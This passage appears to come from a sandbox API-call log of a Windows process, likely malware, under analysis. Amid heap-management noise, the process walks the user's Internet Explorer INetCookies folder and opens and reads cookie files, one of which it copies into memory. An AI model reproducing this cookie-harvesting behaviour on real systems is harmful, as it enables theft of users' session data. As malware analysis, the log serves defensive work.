hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613bf0 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6361c0 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613860 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6362e0 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613980 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636080 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613aa0 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6137a0 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613950 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6360a0 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f6f0 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f870 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7a0 | out: hHeap=0x5f0000) returned 1 [0181.473] GetProcessHeap () returned 0x5f0000 [0181.473] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f690 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.474] GetProcessHeap () returned 0x5f0000 [0181.474] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636400 | out: hHeap=0x5f0000) returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624e10 | out: hHeap=0x5f0000) returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f580 [0181.475] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.475] FindNextFileA (in: hFindFile=0x6200f0, lpFindFileData=0x5cfba0 | out: lpFindFileData=0x5cfba0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x745b61a0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x745b61a0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x745b61a0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x5cf618, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0181.475] lstrcpynA (in: lpString1=0x5cfad2, lpString2="container.dat", iMaxLength=260 | out: lpString1="container.dat") returned="container.dat" [0181.475] lstrlenA (lpString="*") returned 1 [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f560 [0181.475] lstrcpyA (in: lpString1=0x61f560, lpString2="*" | out: lpString1="*") returned="*" [0181.475] GetProcessHeap () returned 0x5f0000 [0181.475] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.476] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateFileA") returned 0x7ffb2625d8a0 [0181.476] GetProcessHeap () returned 0x5f0000 [0181.476] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.476] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcookies\\container.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0181.476] GetProcessHeap () returned 0x5f0000 [0181.476] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.476] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileSize") returned 0x7ffb2625da90 [0181.476] GetProcessHeap () returned 0x5f0000 [0181.476] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.476] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0181.476] GetProcessHeap () returned 0x5f0000 [0181.476] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f600 [0181.476] GetProcessHeap () returned 0x5f0000 [0181.476] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.476] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0181.476] GetProcessHeap () returned 0x5f0000 [0181.477] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.477] CloseHandle (hObject=0x24c) returned 1 [0181.477] lstrlenA (lpString="") returned 0 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.477] lstrcpyA (in: lpString1=0x61f510, lpString2="" | out: lpString1="") returned="" [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f530 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f520 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f510 [0181.477] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.477] FindNextFileA (in: hFindFile=0x6200f0, lpFindFileData=0x5cfba0 | out: lpFindFileData=0x5cfba0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xc7f39cc0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0xc7f39cc0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x5cf618, cFileName="DNTException", cAlternateFileName="DNTEXC~1")) returned 1 [0181.477] GetProcessHeap () returned 0x5f0000 [0181.477] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f560 [0181.477] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0181.478] GetProcessHeap () returned 0x5f0000 [0181.478] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.478] FindNextFileA (in: hFindFile=0x6200f0, lpFindFileData=0x5cfba0 | out: lpFindFileData=0x5cfba0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x5cf618, cFileName="Low", cAlternateFileName="")) returned 1 [0181.478] GetProcessHeap () returned 0x5f0000 [0181.478] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f510 [0181.478] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0181.478] GetProcessHeap () returned 0x5f0000 [0181.478] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.478] FindNextFileA (in: hFindFile=0x6200f0, lpFindFileData=0x5cfba0 | out: lpFindFileData=0x5cfba0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x5cf618, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0181.478] GetProcessHeap () returned 0x5f0000 [0181.478] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f560 [0181.478] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0181.478] GetProcessHeap () returned 0x5f0000 [0181.478] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.478] FindNextFileA (in: hFindFile=0x6200f0, lpFindFileData=0x5cfba0 | out: lpFindFileData=0x5cfba0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd03614eb, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0xd03614eb, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0xd036287a, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x0, dwReserved1=0x5cf618, cFileName="TAS0OY3R.txt", cAlternateFileName="")) returned 1 [0181.478] lstrcpynA (in: lpString1=0x5cfad2, lpString2="TAS0OY3R.txt", iMaxLength=260 | out: lpString1="TAS0OY3R.txt") returned="TAS0OY3R.txt" [0181.478] lstrlenA (lpString="*") returned 1 [0181.478] GetProcessHeap () returned 0x5f0000 [0181.478] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f590 [0181.478] lstrcpyA (in: lpString1=0x61f590, lpString2="*" | out: lpString1="*") returned="*" [0181.478] GetProcessHeap () returned 0x5f0000 [0181.478] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f660 [0181.478] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateFileA") returned 0x7ffb2625d8a0 [0181.478] GetProcessHeap () returned 0x5f0000 [0181.478] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.478] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\TAS0OY3R.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcookies\\tas0oy3r.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0181.479] GetProcessHeap () returned 0x5f0000 [0181.479] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.479] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileSize") returned 0x7ffb2625da90 [0181.479] GetProcessHeap () returned 0x5f0000 [0181.479] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.479] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f [0181.479] GetProcessHeap () returned 0x5f0000 [0181.479] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f600 [0181.479] GetProcessHeap () returned 0x5f0000 [0181.479] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f510 [0181.479] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.479] GetProcessHeap () returned 0x5f0000 [0181.479] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.479] GetProcessHeap () returned 0x5f0000 [0181.479] GetProcessHeap () returned 0x5f0000 [0181.479] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f580 [0181.479] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.479] GetProcessHeap () returned 0x5f0000 [0181.481] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.481] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f600, Size=0x70) returned 0x611f60 [0181.481] GetProcessHeap () returned 0x5f0000 [0181.481] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f580 [0181.481] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ReadFile") returned 0x7ffb2625dbd0 [0181.481] GetProcessHeap () returned 0x5f0000 [0181.481] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.481] ReadFile (in: hFile=0x24c, lpBuffer=0x611f60, nNumberOfBytesToRead=0x6f, lpNumberOfBytesRead=0x5cf628, lpOverlapped=0x0 | out: lpBuffer=0x611f60*, lpNumberOfBytesRead=0x5cf628*=0x6f, lpOverlapped=0x0) returned 1 [0181.482] GetProcessHeap () returned 0x5f0000 [0181.482] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f670 [0181.482] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0181.482] GetProcessHeap () returned 0x5f0000 [0181.482] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.482] CloseHandle (hObject=0x24c) returned 1 [0181.482] GetProcessHeap () returned 0x5f0000 [0181.482] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x70) returned 0x627350 [0181.482] GetProcessHeap () returned 0x5f0000 [0181.482] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0181.482] GetProcessHeap () returned 0x5f0000 [0181.482] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.482] GetProcessHeap () returned 0x5f0000 [0181.482] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f580 [0181.482] GetProcessHeap () returned 0x5f0000 [0181.482] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5b0 [0181.483] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f660 [0181.483] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.483] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f580, Size=0x5) returned 0x61f540 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f510, Size=0x70) returned 0x611f60 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.483] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f660 [0181.483] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.483] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f540, Size=0x9) returned 0x61f5d0 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.483] GetProcessHeap () returned 0x5f0000 [0181.483] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627350 | out: hHeap=0x5f0000) returned 1 [0181.484] lstrlenA (lpString="\n") returned 1 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5a0 [0181.484] lstrcpyA (in: lpString1=0x61f5a0, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.484] lstrlenA (lpString="MUIDB\n392F526C06816A85186842D307536B22\nieonline.microsoft.com/\n25600\n1130274944\n30991936\n3493205227\n30912613\n") returned 109 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6e) returned 0x627350 [0181.484] lstrcpyA (in: lpString1=0x627350, lpString2="MUIDB\n392F526C06816A85186842D307536B22\nieonline.microsoft.com/\n25600\n1130274944\n30991936\n3493205227\n30912613\n" | out: lpString1="MUIDB\n392F526C06816A85186842D307536B22\nieonline.microsoft.com/\n25600\n1130274944\n30991936\n3493205227\n30912613\n") returned="MUIDB\n392F526C06816A85186842D307536B22\nieonline.microsoft.com/\n25600\n1130274944\n30991936\n3493205227\n30912613\n" [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f580 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f4a0 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.484] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f520 [0181.484] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.484] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f4a0, Size=0x5) returned 0x61f510 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f580, Size=0x6e) returned 0x6273d0 [0181.484] GetProcessHeap () returned 0x5f0000 [0181.484] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f580 [0181.485] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.485] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.485] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f510, Size=0x9) returned 0x61f520 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f530 [0181.485] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.485] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.485] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f520, Size=0x11) returned 0x636140 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.485] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f620 [0181.485] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.485] GetProcessHeap () returned 0x5f0000 [0181.486] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] GetProcessHeap () returned 0x5f0000 [0181.486] RtlAllocateHeap (HeapHandle=0x5f0000, 